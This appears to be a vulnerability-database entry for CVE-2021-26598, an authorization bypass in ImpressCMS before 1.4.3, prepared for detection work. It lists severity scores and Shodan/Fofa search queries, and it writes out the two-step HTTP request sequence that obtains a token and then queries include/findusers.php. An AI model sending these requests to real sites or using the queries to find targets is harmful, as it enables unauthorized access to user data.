🔙 목록으로 돌아가기

CVE-2021-26598: ImpressCMS <1.4.3 - Incorrect Authorization

TitleImpressCMS <1.4.3 - Incorrect Authorization
Authorgy741,pdteam
SeverityMedium
ImpactAn attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
RemediationUpgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.
CVSS Score5.3
EPSS Score0.76068
CVE IDCVE-2021-26598
CWE IDCWE-287
Shodan Queryhttp.html:"ImpressCMS"cpe:"cpe:2.3:a:impresscms:impresscms"http.html:"impresscms"
Fofa Querybody="impresscms"
Tags cve cve2021 hackerone impresscms unauth cms vuln

🔍 Vulnerability Description

ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /misc.php?action=showpopups&type=friend HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /include/findusers.php?token=2oWgUA HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26598.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-26598.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A